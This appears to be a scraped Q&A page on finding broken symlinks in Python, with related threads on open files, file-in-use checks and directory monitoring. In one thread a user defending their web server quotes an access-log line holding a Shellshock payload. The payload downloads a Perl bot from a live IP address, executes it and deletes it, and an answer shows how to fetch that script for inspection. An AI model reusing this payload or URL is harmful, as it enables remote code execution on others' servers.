Find broken symlinks with Python
If I call os.stat() on a broken symlink, Python throws an OSError exception. That makes the exception useful for finding broken symlinks. However, there are a few other reasons os.stat() might throw a similar exception. Is there a more precise way of detecting broken symlinks with Python under Linux?
A common Python saying is that it's easier to ask forgiveness than permission. While I'm not a fan of this statement in real life, it does apply in a lot of cases. Usually you want to avoid code that chains two system calls on the same file, because you never know what will happen to the file between the two calls.
A typical mistake is to write something like:
if os.path.exists(path):
    os.unlink(path)
The second call (os.unlink) may fail if something else deleted the file after your test, raise an exception, and stop the rest of your function from executing. (You might think this doesn't happen in real life, but we fished another bug like that out of our codebase just last week - and it was the kind of bug that left a few programmers scratching their heads and claiming 'Heisenbug' for the last few months.)
So, in your particular case, I would probably do:
import errno
import os

try:
    os.stat(path)
except OSError as e:
    if e.errno == errno.ENOENT:
        print('path %s does not exist or is a broken symlink' % path)
    else:
        raise
The annoyance here is that stat returns the same error code for a symlink that just isn't there and a broken symlink.
So, I guess you have no choice but to break the atomicity and do something like:

if not os.path.exists(os.readlink(path)):
    print('path %s is a broken symlink' % path)

This is not atomic, but it works.
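One caveat worth hedging on: os.readlink() returns the raw link target, which may be relative to the link's own directory, so a slightly safer (still non-atomic) sketch might be (is_broken is a hypothetical helper name):

import os

def is_broken(path):
    if not os.path.islink(path):
        return False
    target = os.readlink(path)
    # resolve a relative target against the directory containing the link
    target = os.path.join(os.path.dirname(path), target)
    return not os.path.exists(target)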
os.path.islink(filename) and not os.path.exists(filename)
Indeed, by RTFM (reading the fantastic manual) we see:
os.path.exists(path)
Return True if path refers to an existing path. Returns False for broken symbolic links.
It also says:
On some platforms, this function may return False if permission is not granted to execute os.stat() on the requested file, even if the path physically exists.
So if you are worried about permissions, you should add other clauses.
os.lstat() may be helpful. If lstat() succeeds and stat() fails, then it's probably a broken link.
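A minimal sketch of that lstat()/stat() idea (is_broken_symlink is a hypothetical helper name; treating only ENOENT as "broken" is an assumption):

import errno
import os

def is_broken_symlink(path):
    try:
        os.lstat(path)   # succeeds if the link itself exists
    except OSError:
        return False     # nothing there at all
    try:
        os.stat(path)    # follows the link; fails if the target is gone
    except OSError as e:
        if e.errno == errno.ENOENT:
            return True  # the link exists but its target doesn't
        raise            # some other failure, e.g. permissions
    return False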
Can I mention testing for hardlinks without python? /bin/test has the FILE1 -ef FILE2 condition that is true when files share an inode.
Therefore, something like find . -type f -exec test \{} -ef /path/to/file \; -print works for hard link testing to a specific file.
Which brings me to reading man test and the mentions of -L and -h, which both work on one file and return true if that file is a symbolic link - however, that doesn't tell you whether the target is missing.

I did find that head -0 FILE1 returns an exit code of 0 if the file can be opened and 1 if it cannot, which in the case of a symbolic link to a regular file works as a test for whether its target can be read.
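A rough Python analogue of that head -0 test is simply trying to open the file (target_readable is a hypothetical name; nothing is read, it only checks that open() succeeds):

def target_readable(path):
    try:
        with open(path, 'rb'):
            return True
    except OSError:
        return False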
os.path

You may try using os.path.realpath() to get what the symlink points to, then trying to determine whether it's a valid file using os.path.isfile().

(I'm not able to try that out at the moment, so you'll have to play around with it and see what you get.)
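Untested, as noted above, but a minimal sketch of that suggestion (target_is_file is a hypothetical helper name):

import os

def target_is_file(path):
    # realpath() resolves the entire chain of symlinks
    real = os.path.realpath(path)
    return os.path.isfile(real)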
I used this variant. When a symlink is broken, path.exists returns False while path.islink returns True, so combining these two facts we can use the following:

import os
from os import path

def kek(argum):
    p = "/root/" + argum
    if path.islink(p) and not path.exists(p):
        print("The path is a broken link, location: " + os.readlink(p))
    else:
        return "No broken links found"
I'm not a Python guy, but it looks like os.readlink()? The logic I would use in Perl is to use readlink() to find the target and then use stat() to test whether the target exists.

Edit: I banged out some Perl that demos readlink. I believe Perl's stat and readlink and Python's os.stat() and os.readlink() are both wrappers for the system calls, so this should translate reasonably well as proof-of-concept code:
wembley 0 /home/jj33/swap > cat p
my $f = shift;
while (my $l = readlink($f)) {
    print "$f -> $l\n";
    $f = $l;
}

if (!-e $f) {
    print "$f doesn't exist\n";
}
wembley 0 /home/jj33/swap > ls -l | grep ^l
lrwxrwxrwx 1 jj33 users 17 Aug 21 14:30 link -> non-existant-file
lrwxrwxrwx 1 root users 31 Oct 10 2007 mm -> ../systems/mm/20071009-rewrite//
lrwxrwxrwx 1 jj33 users 2 Aug 21 14:34 mmm -> mm/
wembley 0 /home/jj33/swap > perl p mm
mm -> ../systems/mm/20071009-rewrite/
wembley 0 /home/jj33/swap > perl p mmm
mmm -> mm
mm -> ../systems/mm/20071009-rewrite/
wembley 0 /home/jj33/swap > perl p link
link -> non-existant-file
non-existant-file doesn't exist
wembley 0 /home/jj33/swap >
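For reference, a rough Python translation of that Perl loop (untested; resolving relative targets against the link's directory is an added assumption):

import os

f = 'link'  # hypothetical starting path
while os.path.islink(f):
    target = os.readlink(f)
    print('%s -> %s' % (f, target))
    # a relative target is interpreted relative to the link's directory
    f = os.path.join(os.path.dirname(f), target)
if not os.path.exists(f):
    print("%s doesn't exist" % f)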
I had a similar problem: how to catch broken symlinks, even when they occur in some parent dir? I also wanted to log all of them (in an application dealing with a fairly large number of files), but without too many repeats.
Here is what I came up with, including unit tests.
fileutil.py:
import os
from functools import lru_cache
import logging

logger = logging.getLogger(__name__)


@lru_cache(maxsize=2000)
def check_broken_link(filename):
    """
    Check for broken symlinks, either at the file level, or in the
    hierarchy of parent dirs.
    If it finds a broken link, an ERROR message is logged.
    The function is cached, so that the same error messages are not repeated.

    Args:
        filename: file to check

    Returns:
        True if the file (or one of its parents) is a broken symlink.
        False otherwise (i.e. either it exists or not, but no element
        on its path is a broken link).
    """
    if os.path.isfile(filename) or os.path.isdir(filename):
        return False
    if os.path.islink(filename):
        # there is a symlink, but it is dead (pointing nowhere)
        link = os.readlink(filename)
        logger.error('broken symlink: {} -> {}'.format(filename, link))
        return True
    # ok, we have either:
    # 1. a filename that simply doesn't exist (but the containing dir
    #    does exist), or
    # 2. a broken link in some parent dir
    parent = os.path.dirname(filename)
    if parent == filename:
        # reached root
        return False
    return check_broken_link(parent)
Unit tests:
import logging
import shutil
import tempfile
import os
import unittest

from ..util import fileutil


class TestFile(unittest.TestCase):

    def _mkdir(self, path, create=True):
        d = os.path.join(self.test_dir, path)
        if create:
            os.makedirs(d, exist_ok=True)
        return d

    def _mkfile(self, path, create=True):
        f = os.path.join(self.test_dir, path)
        if create:
            d = os.path.dirname(f)
            os.makedirs(d, exist_ok=True)
            with open(f, mode='w') as fp:
                fp.write('hello')
        return f

    def _mklink(self, target, path):
        f = os.path.join(self.test_dir, path)
        d = os.path.dirname(f)
        os.makedirs(d, exist_ok=True)
        os.symlink(target, f)
        return f

    def setUp(self):
        # reset the lru_cache of check_broken_link
        fileutil.check_broken_link.cache_clear()
        # create a temporary directory for our tests
        self.test_dir = tempfile.mkdtemp()
        # create a small tree of dirs, files, and symlinks
        self._mkfile('a/b/c/foo.txt')
        self._mklink('b', 'a/x')
        self._mklink('b/c/foo.txt', 'a/f')
        self._mklink('../..', 'a/b/c/y')
        self._mklink('not_exist.txt', 'a/b/c/bad_link.txt')
        bad_path = self._mkfile('a/XXX/c/foo.txt', create=False)
        self._mklink(bad_path, 'a/b/c/bad_path.txt')
        self._mklink('not_a_dir', 'a/bad_dir')

    def tearDown(self):
        # Remove the directory after the test
        shutil.rmtree(self.test_dir)

    def catch_check_broken_link(self, expected_errors, expected_result, path):
        filename = self._mkfile(path, create=False)
        with self.assertLogs(level='ERROR') as cm:
            result = fileutil.check_broken_link(filename)
            # trick: emit one extra message, so the assertLogs block doesn't fail
            logging.critical('nothing')
        error_logs = [r for r in cm.records if r.levelname == 'ERROR']
        actual_errors = len(error_logs)
        self.assertEqual(expected_result, result, msg=path)
        self.assertEqual(expected_errors, actual_errors, msg=path)

    def test_check_broken_link_exists(self):
        self.catch_check_broken_link(0, False, 'a/b/c/foo.txt')
        self.catch_check_broken_link(0, False, 'a/x/c/foo.txt')
        self.catch_check_broken_link(0, False, 'a/f')
        self.catch_check_broken_link(0, False, 'a/b/c/y/b/c/y/b/c/foo.txt')

    def test_check_broken_link_notfound(self):
        self.catch_check_broken_link(0, False, 'a/b/c/not_found.txt')

    def test_check_broken_link_badlink(self):
        self.catch_check_broken_link(1, True, 'a/b/c/bad_link.txt')
        self.catch_check_broken_link(0, True, 'a/b/c/bad_link.txt')

    def test_check_broken_link_badpath(self):
        self.catch_check_broken_link(1, True, 'a/b/c/bad_path.txt')
        self.catch_check_broken_link(0, True, 'a/b/c/bad_path.txt')

    def test_check_broken_link_badparent(self):
        self.catch_check_broken_link(1, True, 'a/bad_dir/c/foo.txt')
        self.catch_check_broken_link(0, True, 'a/bad_dir/c/foo.txt')
        # bad link, but shouldn't log a new error:
        self.catch_check_broken_link(0, True, 'a/bad_dir/c')
        # bad link, but shouldn't log a new error:
        self.catch_check_broken_link(0, True, 'a/bad_dir')


if __name__ == '__main__':
    unittest.main()
For Python 3, you can use the pathlib module. From its docs,
If the path points to a symlink, exists() returns whether the symlink points to an existing file or directory.
So this works too.
import pathlib
path = pathlib.Path("/path/to/somewhere")
if path.is_symlink() and not path.exists():
    print(f"found dangling symlink at {path}")
Related
Check if a File is written or in use by another process
I'm trying to find a solution to the following problem but can't find a good one. I have a folder with subfolders and files in it. Some of the files may be in use by another process (the other process is writing data to a .mdf file). I simply want to check whether the files are in use or not.

Structure:

A_Folder
    Setup
    Data1
        .mdf-file1
        .mdf-file2
    Data2
    Data3
    Evaluation

Something like:

def file_in_use(file):
    # *your solution*
    ...

for file in folder:
    if file_in_use(file):
        print("file in use")
        break

I'm using Win10, PyCharm and a venv. So far I tried, from other "solutions": psutil (works, but is too slow); open() and os.rename (won't work for me); subprocess (won't work either - can't find my filename). Using the method from Amit Gupta from the link down below, my file looks like this: "C:\Data\S_t_h\S-t-h\H001.mdf". Basically I tried everything from this question: Check if a file is not open nor being used by another process.

from subprocess import check_output, Popen, PIPE

src = r"C:\Data\S_t_h\S-t-h\H001.mdf"
files_in_use = False

def file_in_use(src):
    try:
        lsout = Popen(['lsof', src], stdout=PIPE, shell=False)
        check_output(["grep", src], stdin=lsout.stdout, shell=False)
    except:
        return False
    return True

if file_in_use(src):
    files_in_use = True

And I'm getting:

FileNotFoundError: [WinError 2] The system cannot find the file specified

This link suggests setting shell=True: winerror-2-the-system-cannot-find-the-file-specified-python. Now I'm getting that "lsof" and "grep" can't be found or are wrong.

Here is the psutil method that works for me, but is too slow (~10 seconds):

import psutil

src = r"C:\Data\S_t_h\S-t-h\H001.mdf"

def has_handle(src):
    for proc in psutil.process_iter():
        try:
            for item in proc.open_files():
                if src == item.path:
                    return True
        except Exception:
            pass
    return False

print(has_handle(src))

My solution: sorry for the delayed answer. It simply worked with:

try:
    os.rename(src, src)
    return False
except OSError:  # file is in use
    return True

I made it more complicated than it actually was, I guess. But thank you guys anyway for your feedback and criticism.
How to unit-test for failed file deletion?
I have an os.remove() in my code that sometimes, when run locally, fails due to OSError 13 - Permission Denied - thus I've set up a try-except. My automated testing (Travis CI) runs on Linux VM instances, so I don't know how to make os.remove fail there for the sake of coverage. What are my options - how do I force the except block to execute? Alternatively, how do I delete-protect a file with Python?

Note: removing the files in the test code before calling the test method isn't an option; the method itself fetches the files to be removed:

from pathlib import Path

paths = [str(x) for x in Path("directory/").iterdir() if 'abc' in x.stem]

if len(paths) > 0:  # if files are removed beforehand, len(paths) == 0
    try:
        [os.remove(p) for p in paths]
    except:
        pass
    # stuff here
You can use unittest.mock.patch to patch os.remove and specify OSError as a side_effect:

from unittest.mock import patch
...

with patch('os.remove') as mock_remove:
    mock_remove.side_effect = OSError('Permission Denied')
    try:
        [os.remove(p) for p in paths]
    except OSError as e:
        pass  # handle error here
Python: Check if a /dev/disk device exists
I am trying to write a python script to find out if a disk device exists in /dev, but it always yields False. Is there any other way to do this? I tried:

>>> import os.path
>>> os.path.isfile("/dev/bsd0")
False
>>> os.path.exists("/dev/bsd0")
False

$ ll /dev
...
brw-rw---- 1 root disk 252, 0 Nov 12 21:28 bsd0
...
Some unconventional situation is going on here. os.path.isfile() will return True for regular files; for device files it will be False. But as for os.path.exists(), the documentation states that False may be returned if "permission is not granted to execute os.stat()". FYI, the implementation of os.path.exists is:

def exists(path):
    """Test whether a path exists. Returns False for broken symbolic links"""
    try:
        os.stat(path)
    except OSError:
        return False
    return True

So, if os.stat is failing on you, I don't see how ls could have succeeded (ls AFAIK also calls the stat() syscall). Check what os.stat('/dev/bsd0') is raising to understand why you're not able to detect the existence of this particular device file with os.path.exists, because os.path.exists() is supposed to be a valid way to check for the existence of a block device file.
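For example, a small sketch to see exactly what os.stat() raises (device path taken from the question):

import errno
import os

try:
    os.stat('/dev/bsd0')
except OSError as e:
    # errno.errorcode maps the error number back to its symbolic name
    print(e.errno, errno.errorcode.get(e.errno), os.strerror(e.errno))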
This was not rigorously tested, but it seems to work:

import os
import stat

def disk_exists(path):
    try:
        return stat.S_ISBLK(os.stat(path).st_mode)
    except:
        return False

Results:

>>> disk_exists("/dev/bsd0")
True
>>> disk_exists("/dev/bsd2")
False
A python script to monitor a directory for new files
Similar questions have been asked, but they either did not work for me or I failed to understand the answers. I run an Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me. The Apache2 access log shows:

195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"

which is clearly attempting (over and over again in my logs) to force my server to download cox.pl, then run cox.pl, then remove cox.pl. I really want to know what is in cox.pl, which could be a modified version of Cox-Data-Usage, which is on GitHub. I would like a script that will constantly monitor my /tmp folder, and when a new file is added, copy that file to another directory for me to see what it is doing, or attempting to do at least. I know I could deny access etc., but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded; it contains ShellBOT by: devil__ so... guess ;-) You could use tutorial_notifier.py from pyinotify, but there's no need for it in this particular case. Just do:

curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt

to check the script. It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a Python script; this is more of a security issue for the likes of Fail2ban or similar to handle. But there is a way to monitor a directory for changes using Python Watchdog (pip install watchdog). Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example

import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()

This will log all changes (it can be configured for just file creation, as sketched below). If you want to rename new files to something else, you first need to know whether the file is free, since any modification will fail while it isn't finished downloading or being created. That also means a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a complete solution.
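To react only to file creation, as mentioned above, a minimal sketch subclassing watchdog's FileSystemEventHandler (the quarantine destination and the copy step are assumptions based on what the question asked for):

import shutil
from watchdog.events import FileSystemEventHandler

class CopyNewFiles(FileSystemEventHandler):
    def on_created(self, event):
        # fires once for every newly created file or directory
        if not event.is_directory:
            shutil.copy2(event.src_path, '/path/to/quarantine')  # placeholder destination

Use an instance of CopyNewFiles in place of LoggingEventHandler in the example above.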
I got some solutions.

Solution 1 (CPU usage: 27.9%, approx. 30%):

import os

path_to_watch = "your/path"
print('Your folder path is "', path_to_watch, '"')
before = dict([(f, None) for f in os.listdir(path_to_watch)])
while 1:
    after = dict([(f, None) for f in os.listdir(path_to_watch)])
    added = [f for f in after if f not in before]
    if added:
        print("Added: ", ", ".join(added))
        break
    else:
        before = after

I have edited the code; the original code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html. The original code was made in Python 2.x, so you need to convert it to Python 3. Note: whenever you add any file in the path, it prints the text and breaks; if no files are added, it continues to run.

Solution 2 (CPU usage: 23.4%, approx. 20%):

import os

path = r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b = os.listdir(path)
path_len_org = len(b)

def file_check():
    while 1:
        b = os.listdir(path)
        path_len_final = len(b)
        if path_len_org < path_len_final:
            return "A file is added"
        elif path_len_org > path_len_final:
            return "A file is removed"
        else:
            pass

file_check()
check what files are open in Python
I'm getting an error in a program that is supposed to run for a long time: too many files are open. Is there any way I can keep track of which files are open, so I can print that list out occasionally and see where the problem is?
To list all open files in a cross-platform manner, I would recommend psutil.

#!/usr/bin/env python
import psutil

for proc in psutil.process_iter():
    print(proc.open_files())

The original question implicitly restricts the operation to the currently running process, which can be accessed through psutil's Process class.

proc = psutil.Process()
print(proc.open_files())

Lastly, you'll want to run the code using an account with the appropriate permissions to access this information, or you may see AccessDenied errors.
I ended up wrapping the built-in file object at the entry point of my program. I found out that I wasn't closing my loggers.

import io
import sys
import builtins
import traceback
from functools import wraps

def opener(old_open):
    @wraps(old_open)
    def tracking_open(*args, **kw):
        file = old_open(*args, **kw)

        old_close = file.close

        @wraps(old_close)
        def close():
            old_close()
            open_files.remove(file)
        file.close = close
        file.stack = traceback.extract_stack()

        open_files.add(file)
        return file
    return tracking_open

def print_open_files():
    print(f'### {len(open_files)} OPEN FILES: [{", ".join(f.name for f in open_files)}]', file=sys.stderr)
    for file in open_files:
        print(f'Open file {file.name}:\n{"".join(traceback.format_list(file.stack))}', file=sys.stderr)

open_files = set()
io.open = opener(io.open)
builtins.open = opener(builtins.open)
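A possible way to wire that up (an assumption, not part of the original answer) is to register the report to run at interpreter exit:

import atexit

# print whatever is still open when the program ends
atexit.register(print_open_files)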
On Linux, you can look at the contents of /proc/self/fd: $ ls -l /proc/self/fd/ total 0 lrwx------ 1 foo users 64 Jan 7 15:15 0 -> /dev/pts/3 lrwx------ 1 foo users 64 Jan 7 15:15 1 -> /dev/pts/3 lrwx------ 1 foo users 64 Jan 7 15:15 2 -> /dev/pts/3 lr-x------ 1 foo users 64 Jan 7 15:15 3 -> /proc/9527/fd
Although the solutions above that wrap opens are useful for one's own code, I was debugging my client to a third-party library including some C extension code, so I needed a more direct way. The following routine works under darwin, and (I hope) other unix-like environments:

def get_open_fds():
    '''
    Return the number of open file descriptors for the current process.

    .. warning: will only work on UNIX-like os-es.
    '''
    import subprocess
    import os

    pid = os.getpid()
    procs = subprocess.check_output(["lsof", '-w', '-Ff', "-p", str(pid)])
    # lsof -Ff prints one field per line; file descriptor lines start with 'f'
    nprocs = len([s for s in procs.decode().split('\n')
                  if s and s[0] == 'f' and s[1:].isdigit()])
    return nprocs

If anyone can extend it to be portable to Windows, I'd be grateful.
On Linux, you can use lsof to show all files opened by a process.
As said earlier, you can list fds on Linux in /proc/self/fd. Here is a simple method to list them programmatically:

import os
import sys
import errno

def list_fds():
    """List process currently open FDs and their target"""
    if not sys.platform.startswith('linux'):
        raise NotImplementedError('Unsupported platform: %s' % sys.platform)

    ret = {}
    base = '/proc/self/fd'
    for num in os.listdir(base):
        path = None
        try:
            path = os.readlink(os.path.join(base, num))
        except OSError as err:
            # Last FD is always the "listdir" one (which may be closed)
            if err.errno != errno.ENOENT:
                raise
        ret[int(num)] = path

    return ret
On Windows, you can use Process Explorer to show all file handles owned by a process.
There are some limitations to the accepted response, in that it does not seem to count pipes. I had a python script that opened many sub-processes, and was failing to properly close standard input, output, and error pipes, which were used for communication. If I use the accepted response, it will fail to count these open pipes as open files, but (at least in Linux) they are open files and count toward the open file limit. The lsof -p solution suggested by sumid and shunc works in this situation, because it also shows you the open pipes.
Get a list of all open files. handle.exe is part of Microsoft's Sysinternals Suite. An alternative is the psutil Python module, but I find 'handle' will print out more files in use. Here is what I made. Kludgy code warning.

#!/bin/python3
# coding: utf-8
"""Build set of files that are in-use by processes.
Requires 'handle.exe' from Microsoft SysInternals Suite.
This seems to give a more complete list than using the psutil module.
"""
from collections import OrderedDict
import os
import re
import subprocess

# Path to handle executable
handle = "E:/Installers and ZIPs/Utility/Sysinternalssuite/handle.exe"

# Get output string from 'handle'
handle_str = subprocess.check_output([handle]).decode(encoding='ASCII')

"""
Build list of lists.
1. Split string output, using '-' * 78 as section breaks.
2. Ignore first section, because it is executable version info.
3. Turn list of strings into a list of lists, ignoring first item (it's empty).
"""
work_list = [x.splitlines()[1:] for x in handle_str.split(sep='-' * 78)[1:]]

"""
Build OrderedDict of pid information.
pid_dict['pid_num'] = ['pid_name', 'open_file_1', 'open_file_2', ...]
"""
pid_dict = OrderedDict()
re1 = re.compile(r"(.*?\.exe) pid: ([0-9]+)")  # pid name, pid number
re2 = re.compile(r".*File.*\s\s\s(.*)")  # File name
for x_list in work_list:
    key = ''
    file_values = []
    m1 = re1.match(x_list[0])
    if m1:
        key = m1.group(2)
        # file_values.append(m1.group(1))  # pid name first item in list
    for y_strings in x_list:
        m2 = re2.match(y_strings)
        if m2:
            file_values.append(m2.group(1))
    pid_dict[key] = file_values

# Make a set of all the open files
values = []
for v in pid_dict.values():
    values.extend(v)
files_open = sorted(set(values))

txt_file = os.path.join(os.getenv('TEMP'), 'lsof_handle_files')
with open(txt_file, 'w') as fd:
    for a in sorted(files_open):
        fd.write(a + '\n')
subprocess.call(['notepad', txt_file])
os.remove(txt_file)
I'd guess that you are leaking file descriptors. You probably want to look through your code to make sure that you are closing all of the files that you open.
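The usual fix is to open files with a context manager so they are closed even when exceptions occur - a generic sketch (process is a hypothetical function):

with open('data.txt') as fh:
    process(fh)  # the file is closed automatically when the block exits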
You can use the following script. It builds on Claudiu's answer. It addresses some of the issues and adds additional features: it prints a stack trace of where the file was opened, prints on program exit, and supports keyword arguments. Here's the code and a link to the gist, which is possibly more up to date.

"""
Collect stacktraces of where files are opened, and prints them out
before the program exits.

Example
========

monitor.py
----------
from filemonitor import FileMonitor
FileMonitor().patch()
f = open('/bin/ls')
# end of monitor.py

$ python monitor.py
----------------------------------------------------------------------------
path = /bin/ls
> File "monitor.py", line 3, in <module>
>   f = open('/bin/ls')
----------------------------------------------------------------------------

Solution modified from:
https://stackoverflow.com/questions/2023608/check-what-files-are-open-in-python
"""
from __future__ import print_function
import __builtin__
import traceback
import atexit
import textwrap


class FileMonitor(object):

    def __init__(self, print_only_open=True):
        self.openfiles = []
        self.oldfile = __builtin__.file
        self.oldopen = __builtin__.open
        self.do_print_only_open = print_only_open
        self.in_use = False

        class File(self.oldfile):

            def __init__(this, *args, **kwargs):
                path = args[0]
                self.oldfile.__init__(this, *args, **kwargs)
                if self.in_use:
                    return
                self.in_use = True
                self.openfiles.append((this, path, this._stack_trace()))
                self.in_use = False

            def close(this):
                self.oldfile.close(this)

            def _stack_trace(this):
                try:
                    raise RuntimeError()
                except RuntimeError as e:
                    stack = traceback.extract_stack()[:-2]
                    return traceback.format_list(stack)

        self.File = File

    def patch(self):
        __builtin__.file = self.File
        __builtin__.open = self.File
        atexit.register(self.exit_handler)

    def unpatch(self):
        __builtin__.file = self.oldfile
        __builtin__.open = self.oldopen

    def exit_handler(self):
        indent = '  > '
        terminal_width = 80
        for file, path, trace in self.openfiles:
            if file.closed and self.do_print_only_open:
                continue
            print("-" * terminal_width)
            print("  {} = {}".format('path', path))
            lines = ''.join(trace).splitlines()
            _updated_lines = []
            for l in lines:
                ul = textwrap.fill(l,
                                   initial_indent=indent,
                                   subsequent_indent=indent,
                                   width=terminal_width)
                _updated_lines.append(ul)
            lines = _updated_lines
            print('\n'.join(lines))
            print("-" * terminal_width)
            print()